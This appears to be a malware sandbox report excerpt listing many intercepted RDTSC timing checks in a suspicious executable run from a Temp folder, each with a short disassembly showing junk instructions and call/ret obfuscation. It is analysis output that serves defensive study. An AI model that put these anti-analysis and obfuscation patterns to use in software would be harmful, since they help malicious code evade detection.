Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B010ED second address: B0111F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FD668F2A636h 0x00000009 jmp 00007FD668F2A648h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007FD668F2A636h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B0111F second address: B01125 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B01242 second address: B0125D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD668F2A647h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B0125D second address: B01297 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jc 00007FD668F2A777h 0x0000000f jmp 00007FD668F2A771h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jg 00007FD668F2A76Eh 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B01297 second address: B0129B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B0129B second address: B012A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B012A1 second address: B012C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007FD668F2A636h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007FD668F2A63Bh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B012C4 second address: B01316 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FD668F2A768h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 push 00000003h 0x00000025 push 00000000h 0x00000027 mov edi, dword ptr [ebp+122D29C0h] 0x0000002d push 00000003h 0x0000002f jmp 00007FD668F2A774h 0x00000034 push DA7E1349h 0x00000039 push ecx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B01316 second address: B0131A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B01392 second address: B01450 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D295Ch] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FD668F2A768h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edx, 308D7F32h 0x00000033 push 1AB7C3B0h 0x00000038 jmp 00007FD668F2A76Fh 0x0000003d xor dword ptr [esp], 1AB7C330h 0x00000044 add dword ptr [ebp+122D2DDAh], ebx 0x0000004a push 00000003h 0x0000004c mov dword ptr [ebp+122D227Eh], edx 0x00000052 push 00000000h 0x00000054 jbe 00007FD668F2A76Ch 0x0000005a mov ecx, dword ptr [ebp+122D2BD0h] 0x00000060 mov esi, dword ptr [ebp+122D2027h] 0x00000066 push 00000003h 0x00000068 push 00000000h 0x0000006a push esi 0x0000006b call 00007FD668F2A768h 0x00000070 pop esi 0x00000071 mov dword ptr [esp+04h], esi 0x00000075 add dword ptr [esp+04h], 0000001Ch 0x0000007d inc esi 0x0000007e push esi 0x0000007f ret 0x00000080 pop esi 0x00000081 ret 0x00000082 mov di, E428h 0x00000086 call 00007FD668F2A769h 0x0000008b push eax 0x0000008c push edx 0x0000008d jne 00007FD668F2A76Ch 0x00000093 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B01450 second address: B01456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B01456 second address: B0145A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B0145A second address: B01490 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD668F2A647h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD668F2A63Fh 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B01490 second address: B014BC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD668F2A766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov eax, dword ptr [eax] 0x0000000d jnp 00007FD668F2A771h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jnc 00007FD668F2A766h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B014BC second address: B014C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B014C0 second address: B014C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B014C6 second address: B014CB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B014CB second address: B0151C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 mov ecx, ebx 0x0000000a lea ebx, dword ptr [ebp+12454E84h] 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FD668F2A768h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a add si, E024h 0x0000002f xchg eax, ebx 0x00000030 jo 00007FD668F2A775h 0x00000036 jmp 00007FD668F2A76Fh 0x0000003b push eax 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B0151C second address: B01520 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B01520 second address: B01524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: AF9DA5 second address: AF9DBD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FD668F2A63Eh 0x0000000c jng 00007FD668F2A636h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: AF9DBD second address: AF9DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: AF9DC1 second address: AF9E0A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD668F2A636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007FD668F2A63Ch 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007FD668F2A65Bh 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: AF9E0A second address: AF9E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A774h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: AF9E23 second address: AF9E3A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD668F2A642h 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B20872 second address: B2087E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pop edi 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B2087E second address: B20882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B20A09 second address: B20A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: AF9E33 second address: AF9E3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B21530 second address: B21556 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD668F2A766h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007FD668F2A77Ah 0x00000012 jmp 00007FD668F2A774h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B216B3 second address: B216DA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD668F2A63Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD668F2A649h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B2183C second address: B21843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B21843 second address: B21880 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A63Bh 0x00000007 jne 00007FD668F2A655h 0x0000000d jns 00007FD668F2A636h 0x00000013 jmp 00007FD668F2A649h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d jo 00007FD668F2A636h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B219B8 second address: B219C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A76Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B219C6 second address: B219CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B219CE second address: B219D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B21F9C second address: B21FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B2239E second address: B223A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B223A4 second address: B223AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B22695 second address: B2269A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B2269A second address: B226BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A649h 0x00000009 jne 00007FD668F2A636h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B226BF second address: B226E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FD668F2A785h 0x0000000b jmp 00007FD668F2A779h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B24C09 second address: B24C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe  RDTSC instruction interceptor: First address: B24C0D second address: B24C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnl 00007FD668F2A77Dh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 js 00007FD668F2A774h 0x00000017 jmp 00007FD668F2A76Eh 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD668F2A770h 0x00000025 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B23D2C second address: B23D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B24E5E second address: B24E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B24E64 second address: B24E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B24E6D second address: B24E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: AF6784 second address: AF6788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2BC42 second address: B2BC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD668F2A766h 0x0000000a rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2BC4C second address: B2BC5E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FD668F2A636h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2BF33 second address: B2BF41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2BF41 second address: B2BF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2BF45 second address: B2BF66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A777h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2C1E1 second address: B2C1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A63Ch 0x00000009 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2C1F1 second address: B2C209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A772h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2C367 second address: B2C372 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2C372 second address: B2C377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2F8A0 second address: B2F8C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A644h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD668F2A63Bh 0x00000012 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2F9C3 second address: B2F9FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A777h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FD668F2A76Fh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007FD668F2A766h 0x0000001d rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2FCEC second address: B2FCFB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD668F2A636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2FECF second address: B2FED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30117 second address: B3011C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30591 second address: B30595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30595 second address: B30599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30599 second address: B3059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B3059F second address: B305A9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD668F2A63Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B305A9 second address: B305DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], ebx 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FD668F2A768h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 sub edi, 078F224Ch 0x00000029 push eax 0x0000002a pushad 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B305DB second address: B305E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B305E4 second address: B305E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30AC4 second address: B30AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30AC8 second address: B30AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FD668F2A766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30B65 second address: B30BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FD668F2A638h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2DEAh], edx 0x0000002c push eax 0x0000002d pushad 0x0000002e jmp 00007FD668F2A63Dh 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 pop edi 0x00000037 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B32B90 second address: B32B9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FD668F2A766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B32B9B second address: B32BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007FD668F2A644h 0x00000012 popad 0x00000013 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B335F7 second address: B335FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B341C2 second address: B341C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
